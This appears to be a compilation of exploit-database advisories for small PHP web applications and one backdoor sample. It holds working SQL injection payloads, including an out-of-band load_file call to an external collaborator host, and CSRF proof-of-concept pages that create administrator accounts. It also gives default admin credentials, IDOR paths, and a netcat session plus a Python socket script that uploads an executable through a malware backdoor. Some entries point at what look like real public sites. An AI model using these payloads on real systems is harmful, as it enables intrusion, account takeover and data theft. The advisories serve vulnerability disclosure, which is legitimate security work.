<pre><code># Exploit Title: Computer Laboratory Management - SQL Injection (Authenticated)<br /># Date: 11/08/2024<br /># Exploit Author: Mert Kuvvet<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip<br /># Version: 1.0<br /># Tested on: Windows 11 / XAMPP<br /><br /><br />############## Authenticated SQL Injection ##############<br /><br /><br /><br /><br />GET /php-lms/admin/?page=user/manage_user&id=7%27%20OR%20SLEEP(10)--%20-<br />HTTP/1.1<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate, br, zstd<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: keep-alive<br />Cookie: PHPSESSID=9daen5894p8jjjehipoq0pi7s6<br />Host: localhost<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36<br /></code></pre>
<pre><code>## Titles: courier-management-system-2020-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 08/12/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/14611/courier-management-system-using-phpmysqli-source-code.html#comment-105424<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks. The<br />payload '+(select load_file('\\\\<br />031mhwgyu0ue8s63z9x3wjzn4ea7yymppdh07ow.oastify.com\\qpq'))+' was submitted<br />in the email parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: email=xtyqLAHz@burpcollaborator.net'+(select load_file('\\\\<br />031mhwgyu0ue8s63z9x3wjzn4ea7yymppdh07ow.oastify.com\\qpq'))+'' OR NOT<br />3092=3092 OR 'zgfp'='bQHN&password=d6I!n9y!D7<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: email=xtyqLAHz@burpcollaborator.net'+(select load_file('\\\\<br />031mhwgyu0ue8s63z9x3wjzn4ea7yymppdh07ow.oastify.com\\qpq'))+'' AND (SELECT<br />8802 FROM(SELECT COUNT(*),CONCAT(0x71716b7871,(SELECT<br />(ELT(8802=8802,1))),0x7162706a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'dmho'='XBTr&password=d6I!n9y!D7<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/courier-system-1-109943338)<br /><br />## More:<br />[href](<br />https://www.nu11secur1ty.com/2024/08/courier-management-system-2020-10.html)<br /><br />## Time spent:<br />01:00:00<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/0fe8f37543e8face08941899add38e35.txt<br />Contact: malvuln13@gmail.com<br />Media: x.com/malvuln <br /><br />Threat: Backdoor.Win32.Nightmare.25<br />Vulnerability: Unauthenticated Remote Command Execution<br />Family: Nightmare<br />Type: PE32<br />MD5: 0fe8f37543e8face08941899add38e35<br />SHA256: 591e348b2c1f25a23f0acf55ba10a71957683b54a5682902c2fa179ba278fff6<br />Vuln ID: MVID-2024-0687<br />Disclosure: 08/09/2024<br />Description: The malware listens on TCP ports 666, 5401 and 5402. Third party adversaries who can reach an infected host on TCP port 666 can issue commands made available by the backdoor. The FTPON command starts an FTP service on TCP port 21, supply any single character after the command E.g. "FTPON x". Furthermore, the FTP server allows for any username/password combination for authentication. Attackers can then upload their own executable to the victim machine using the FTP STOR command. This can undermine the initial adversary intrusion allowing potential takeover by a totally different attacking entity.<br /><br />Commands available:<br />RUN (run programs)<br />FTPON x (starts FTP)<br />SHOWCHAT x<br />LOGOFF x (logs out current user)<br />KILLAPP<br />LISTAPP<br />KILL x (shuts down the backdoor)<br /><br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 666<br /><br />RUN MSPAINT.EXE<br />Program executed<br /><br />FTPON x<br />FTP Port open<br /><br />FTPOFF x<br />FTP Port close<br /><br />SHOWCHAT x<br />Chat is visible (will launch a chat terminal on the slave)<br /><br />HIDECHAT x<br />Chat is invisible<br /><br />LISTAPP x<br />*File: Backdoor.Win32.Nightmare.25.0fe8f37543e8face08941899add38e35.exe - PID: 4284<br />*Process Hacker [DESKTOP-2C4IQJO\VICTIM]+ (Administrator)<br />*dump<br />*Administrator: Administrator Command Prompt<br />*Program Manager <br /><br />KILL x <br />Server not anymore active<br /><br />LOGOFF x<br /><br /><br />nc64.exe 192.168.18.125 21<br />220 P23h FTP Server ready.<br />USER x<br />331 Password required for x.<br />PASS x<br />230 User x logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />MKD TEMP<br />257 'C:\TEMP': directory created.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,226,100).<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=57956 #Calculated port for file transfers 226 * 256 + 100 = 57956<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Gas Agency Management 2022 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new user .<br /><br />[+] Go to the line 1.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /php_action/createUser.php.<br /><br />[+] http://127.0.0.1/gasmark/php_action/createUser.php.<br /><br />[+] save code as poc.html .<br /><br /><form class="form-horizontal" method="POST" id="submitUserForm" action="http://127.0.0.1/gasmark/php_action/createUser.php" enctype="multipart/form-data"><br /><br /> <input type="hidden" name="currnt_date" class="form-control"><br /><br /> <div class="form-group"><br /> <div class="row"><br /> <label class="col-sm-3 control-label">Username</label><br /> <div class="col-sm-9"><br /> <input type="text" name="userName" id="username" class="form-control" placeholder="Username" required="" pattern="^[a-zA-z0-9]+$"><br /> </div><br /> </div><br /> </div><br /> <div class="form-group"><br /> <div class="row"><br /> <label class="col-sm-3 control-label">Password</label><br /> <div class="col-sm-9"><br /> <input type="password" class="form-control" id="upassword" placeholder="Password" name="upassword"><br /> </div><br /> </div><br /> </div><br /> <div class="form-group"><br /> <div class="row"><br /> <label class="col-sm-3 control-label">Email</label><br /> <div class="col-sm-9"><br /> <input type="email" class="form-control" id="uemail" placeholder="Email" name="uemail"><br /> </div><br /> </div><br /> </div><br /> <br /><br /> <button type="submit" name="create" id="createUserBtn" class="btn btn-primary btn-flat m-b-30 m-t-30">Submit</button><br /> </form><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Garden Gate v2.6 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.34network.it/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /prodotto.php?id=\<br /><br />[+] https://www/127.0.0.1/demo/paiardicom/prodotto.php?id=\ <=== inject here<br /><br /> ---<br /><br />Parameter: id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: id=\' AND GTID_SUBSET(CONCAT(0x716b786b71,(SELECT (ELT(6210=6210,1))),0x716b7a7671),6210)-- WkuH<br /> ---<br /> <br />[+] Login : https://www/127.0.0.1/demo/www.paiardicom/tq/index.php?manager=login<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Gaati track v1.0-2023 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = mayuri@admin.com & pass = admin<br /><br />[+] https://www/127.0.0.1/165.232.176.122/index.php?page=home<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Farmacia Gama v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : allows users to access the administrative interface.<br /><br />[+] use payload : /main.php<br /><br />[+] http://127.0.0.1/farmacia-master/main.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Employee Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/16999/employee-management-system.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Computer and Mobile Repair Shop Management System v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/rsms_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following JavaScript code :<br /><br /> creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:<br /><br />[+] Create an XMLHttpRequest object:<br /><br /> xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.<br /><br />[+] Open the request:<br /><br /> xhr.open("POST", "http://127.0.0.1/rsms/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".<br /><br />[+] Set the request headers:<br /><br /> xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.<br /> xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.<br /><br />[+] Enable sending cookies:<br /><br /> xhr.withCredentials = true; Specifies that cookies should be sent with the request.<br /><br />[+] Setting up the request data:<br /><br /> The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.<br /><br /> This string is converted to a Uint8Array and then to a Blob to be sent.<br /><br />[+] Sending the request:<br /><br /> xhr.send(new Blob([aBody])); Sends the data to the server.<br /><br />[+] User Interface:<br /> There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.<br /><br />[+] Go to the line 6. Set the target site link Save changes and apply . <br /><br />[+] infected file : Users.php.<br /><br />[+] Line 15 : Choose a name "indoushka".<br /><br />[+] Line 19 : Choose a pass "Hacked".<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/rsms\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "HAcked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Gaati track v1.0-2023 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /new_user.php<br /> /branch_list.php<br /> /parcel_list.php<br /> /reports.php<br /> /sidebar.php<br /> /staff_list.php<br /><br />[+] https://www/127.0.0.1/ks50.karnataka.govin/sidebar.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>